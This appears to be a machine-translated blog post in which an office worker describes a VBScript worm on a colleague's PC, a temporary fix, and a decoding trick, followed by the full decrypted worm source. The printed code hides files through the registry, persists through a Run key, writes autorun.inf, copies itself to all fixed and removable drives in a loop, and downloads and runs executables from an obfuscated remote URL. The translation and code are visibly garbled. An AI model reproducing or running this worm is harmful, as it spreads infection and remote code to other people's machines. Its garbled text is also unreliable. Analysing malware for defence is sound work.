Recently, people in the same office reflected that they were inexplicably infected with viruses. I did not care about the virus. I did not expect one of my own, so I had this post today.
In other words, one night we were working in a hurry... Suddenly, someone shouted, "how is my CPU usage high ?" Copy the processxpand find that wscript.exe is always looking for a main. vbe. How can I run the script in disorder? It must have been poisoned! And it may be the legendary office virus... Unfortunately, we met... Let's start anatomy! For this script virus, our solution is to disable vbscript. dll, Run "regsrv-u vbscript. dll", and then the CPU is quiet... Open main. vbe! In the C-drive root directory, first remove the hidden and system attributes of the script virus, and then use NotePad to open it! All are garbled! Ah ~ The old one is the old one. The data is encrypted to the victims and there is no such thing as a big head. But if you want to run it, you must decrypt it! Sure enough, there is an excute (thistext) after the dense Garbled text. Isn't thistext a virus plaintext? Okay, write it out! Replace excute (thistext)
Dim fso, MyFile
Set fso = CreateObject ("Scripting. FileSystemObject ")
Set MyFile = fso. CreateTextFile ("c: estfile.txt", True)
MyFile. WriteLine (thistext)
MyFile. Close
Register vbscript. dll
Run! The virus suddenly exists! Code:Ver = "3.0"Haha, the temporary solution is on top, and I have no time to interpret this virus ~~~ Please give the experts a perfect solution! Continue working on ing ......
Tile = "daxian" & ver
About = "daxianbiyele 2007.7.11"
Fromurl = chr (104) & chr (116) & chr (116) & chr (112) & ": //" & chr (104) & chr (103) & "z. "& chr (100) &" in "& chr (103) & chr (104) &" ui123. "& chr (99) &" n/wan. "& chr (97) &" s "& chr (112)
On error resume next
Dim wsh
Dim WshShell
Set Wsh = CreateObject ("WScript. Shell ")
Set WshShell = Wscript. CreateObject ("Wscript. Shell ")
Set FSO = CreateObject ("Scripting. FileSystemObject ")
Set dir = FSO. GetSpecialFolder (1)
Set dc = FSO. Drives
Ouwnname = Wscript. ScriptName
Mulu = left (Wscript. ScriptFullName, len (Wscript. ScriptFullName)-len (Wscript. ScriptName ))
If mulu = dir & "" then sys = true
For Each d In dc
If mulu = d & "" then opendisk = WshShell. Run ("explorer" & d, 3, false)
Next
If not sys = true then
Wscript. sleep 2000
Set y = getobject ("winmgmts: \. ootcimv2 ")
Set x=y.exe cquery ("select * from win32_process where name1_wscript.exe ")
I = 0
For each j in x
I = I + 1
Next
If I> 1 then wscript. quit
End if
Yincang
If fso. FileExists (mulu & "autorun. inf") Then
If readtxt (mulu & "autorun. inf", 1) <> tile then
Buildinf ver, "72.1611.exe", now
End If
Else
Buildinf ver, "72.1611.exe", now
End If
Copyexe = readtxt (mulu & "autorun. inf", 7)
Randomize
Sjs = int (Rnd * (31-1 + 1) + 1
If fso. FileExists (mulu & copyexe) and Day (Date) <> sjs then
If sys = true then WshShell. run mulu & copyexe
Else
Ldownver = readtxt (mulu & "autorun. inf", 5)
Downfile mulu & "temp.txt", fromurl, 0
Set OpenFile = FSO. OpenTextFile (mulu & "temp.txt", 1)
Nouse = OpenFile. ReadLine
Downis = OpenFile. ReadLine
Downver = OpenFile. ReadLine
Downname = month (Date) & "+" & Day (Date) & ". exe"
Downfrom = OpenFile. ReadLine
Vbsver = OpenFile. ReadLine
Vbsname = OpenFile. ReadLine
Vbsurl = OpenFile. ReadLine
Guanggao = OpenFile. ReadLine
OpenFile. Close
FSO. DeleteFile (mulu & "temp.txt ")
If downis = 1 then
If vbsver <> ver then
Downfile mulu & vbsname, vbsurl, 1
Wscript. quit
End if
If downver <> Ldownver then
Downfile mulu & downname, downfrom, 0
Buildinf downver, downname, guanggao
End if
End if
End If
Copyexe = readtxt (mulu & "autorun. inf", 7)
If sys = true then
Ganran ()
WshShell. run mulu & ouwnname
Else
Shuxing mulu & ouwnname, 2 + 4
Copyvbs dir & "main. vbe"
Copyvbs dir & "main.txt"
CopyFile mulu & "autorun. inf", dir & "autorun. inf"
CopyFile mulu & copyexe, dir & "& copyexe
Shuxing dir & "& copyexe, 2 + 4
If mulu <> "C:" then
Copyvbs "c: main. vbs"
CopyFile mulu & "autorun. inf", "c: autorun. inf"
CopyFile mulu & copyexe, "c:" & copyexe
End if
Zhuce
WshShell. run dir & "main. vbe"
End if
Function copyfile (file, where)
Shuxing where, 0
If fso. FileExists (file) then FSO. CopyFile file, where, True
End function
Function copyvbs (where)
Shuxing where, 0
Set self = fso. opentextfile (mulu & ouwnname, 1)
Vbscopy = self. readall
Self. close
Set vbs = fso. CreateTextFile (where, True)
Vbs. write vbscopy
Vbs. close
Shuxing where, 2 + 4
End function
Function zhuce ()
RegPath = "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerun"
Type_Name = "REG_SZ"
Key_Name = "explorer"
Key_Data = "main. vbe"
WshShell. RegWrite RegPath & Key_Name, Key_Data, Type_Name
End function
Function yincang ()
RegPath = "hkey_current_usersoftwaremicrosoftwindowscurrentversionpoliceradvanced"
Type_Name = "REG_DWORD"
Key_Name = "ShowSuperHidden"
Key_Data = "00000000"
WshShell. RegWrite RegPath & Key_Name, Key_Data, Type_Name
End function
Function buildinf (exever, exename, adv)
Shuxing mulu & "autorun. inf", 0
Set ini = fso. CreateTextFile (mulu & "autorun. inf", True)
Ini. writeline tile
Ini. writeline "[AutoRun]"
Ini. writeline about
Ini. writeline "openjavaswscript.exe. main. vbs"
Ini. writeline exever
Ini. writeline "shellopen = open (& O )"
Ini. writeline exename
Ini. writeline "shellopenCommand=WScript.exe. main. vbs"
Ini. writeline "shellopenDefault = 1"
Ini. writeline adv
Ini. close
Shuxing mulu & "autorun. inf", 1 + 2 + 4
End function
Function readtxt (where, line)
Set readfile = fso. OpenTextFile (where, 1)
I = 0
Do while I <line
I = I + 1
RLine = readfile. ReadLine
Loop
Readfile. Close
Readtxt = RLine
End function
Function shuxing (file, change)
If fso. FileExists (file) then
Set oFile = FSO. GetFile (file)
OFile. Attributes = change
Set oFile = Nothing
End if
End function
Function downfile (localfile, urlfile, runfile)
Shuxing localfile, 0
ILocal = LCase (localfile): iRemote = LCase (urlfile ):
If 1 = 2 then Wscript. echo "Impossible! "
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
If 1 = 2 then Wscript. echo "Impossible! "
XPost. Open "get", iRemote, 0
If 1 = 2 then Wscript. echo "Impossible! "
XPost. Send ()
If 1 = 2 then Wscript. echo "Impossible! "
Set sGet = CreateObject ("ADODB. Stream ")
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Mode = 3
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Type = 1
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Open ()
If 1 = 2 then Wscript. echo "Impossible! "
SGet. Write (xPost. responseBody)
If 1 = 2 then Wscript. echo "Impossible! "
SGet. SaveToFile iLocal, 2
If 1 = 2 then Wscript. echo "Impossible! "
Shuxing localfile, 2 + 4
If runfile = 1 then Wsh. run iLocal
End function
Function ganran ()
Do
For Each d In dc
If d. DriveType = 3 or (d. DriveType = 1 and d <> "A:" and d <> "B:") Then
If fso. FileExists (d & "main. vbs") and fso. FileExists (d & "autorun. inf") then
If readtxt (d & "autorun. inf", 1) <> tile then
CopyFile dir & "autorun. inf", d & "autorun. inf"
CopyFile dir & "& copyexe, d &" & copyexe
CopyFile dir & "main.txt", d & "main. vbs"
End if
Else
CopyFile dir & "autorun. inf", d & "autorun. inf"
CopyFile dir & "& copyexe, d &" & copyexe
CopyFile dir & "main.txt", d & "main. vbs"
End if
End If
Next
Wscript. sleep 2000
Loop
End function
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
